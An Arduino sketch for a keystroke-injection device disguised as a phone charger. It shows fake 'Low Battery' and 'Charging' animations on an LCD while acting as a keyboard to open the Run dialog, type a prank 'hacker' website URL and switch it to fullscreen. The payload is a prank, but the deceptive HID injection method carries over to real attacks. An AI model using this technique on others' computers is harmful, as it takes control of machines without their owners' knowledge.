#include <Wire.h> 

#include <LiquidCrystal_I2C.h> 

#include "Keyboard.h" 

 

//instatiation of the lcd component 

LiquidCrystal_I2C screen(0x27,16,2); 

 

bool runInjection = false;  

 

//binary representation of special characters 

byte pacman1[] = {  

  B00000,  

  B01110,  

  B11011,  

  B11100,  

  B11100,  

  B11011,  

  B01110,  

  B00000  

};  

 

 

byte pacman2[] = {  

  B00000,  

  B01110,  

  B11111,  

  B11111,  

  B11111,  

  B11111,  

  B01110,  

  B00000  

};  

 

byte battery1[] = {  

  B01110,  

  B11111,  

  B10001,  

  B10001,  

  B10001,  

  B10001,  

  B11111,  

  B00000  

};  

   

byte battery2[] = {  

  B01110,  

  B11111,  

  B10001,  

  B11111,  

  B11111,  

  B11111,  

  B11111,  

  B00000  

};  

 

void setup() { 

    //setting up of LCD screen 

    screen.init(); 

    screen.backlight(); 

    screen.clear(); 

    //setting up HID device as keyboard 

    Keyboard.begin(); 

    //random message 

    screen.setCursor(0,0); 

    screen.print("Low Battery"); 

    //translating binary patters into special characters 

    screen.createChar(0,pacman1);//open 

    screen.createChar(1,pacman2);//close 

    screen.createChar(2,battery1);//low 

    screen.createChar(3,battery2);//medium 

    //enabling injection 

    runInjection = true; 

    delay(1000); 

} 

 

void loadingAnimation(){ 

  screen.clear(); 

  screen.setCursor(0, 0);  

  screen.print("Low Battery"); 

  //doing pacman animation 

  for(int i=0; i<16;i++){ 

    screen.setCursor(i,1); 

    screen.write(3); 

    delay(200); 

    screen.write(2); 

    delay(200); 

  } 

} 

 

void chargingAnimation(){ 

  screen.clear(); 

  screen.setCursor(0, 0);  

  screen.print("...Charging...."); 

  //doing battery animation 

  for(int i=0; i<16;i++){ 

    screen.setCursor(i,1); 

    screen.write(1); 

    delay(200); 

    screen.write(0); 

    delay(200); 

  } 

} 

 

void injectingKeyboardInjection(){ 

  //open cmd  

  Keyboard.press(KEY_LEFT_GUI); 

  Keyboard.press('r');  

  //release keys 

  Keyboard.releaseAll(); 

  delay(300); 

 

  //insert website's url 

  Keyboard.println("https://pranx.com/hacker/"); 

  delay(1200); 

 

  //press f11 to allow fullscreen 

  Keyboard.press(KEY_F11); 

  Keyboard.releaseAll(); 

 

  //if it is sucessful deactivate to run again 

  runInjection=false; 

} 

 

 

void loop() { 

  if(runInjection){ 

    injectingKeyboardInjection(); 

  } 

  loadingAnimation(); 

  chargingAnimation(); 

} 

 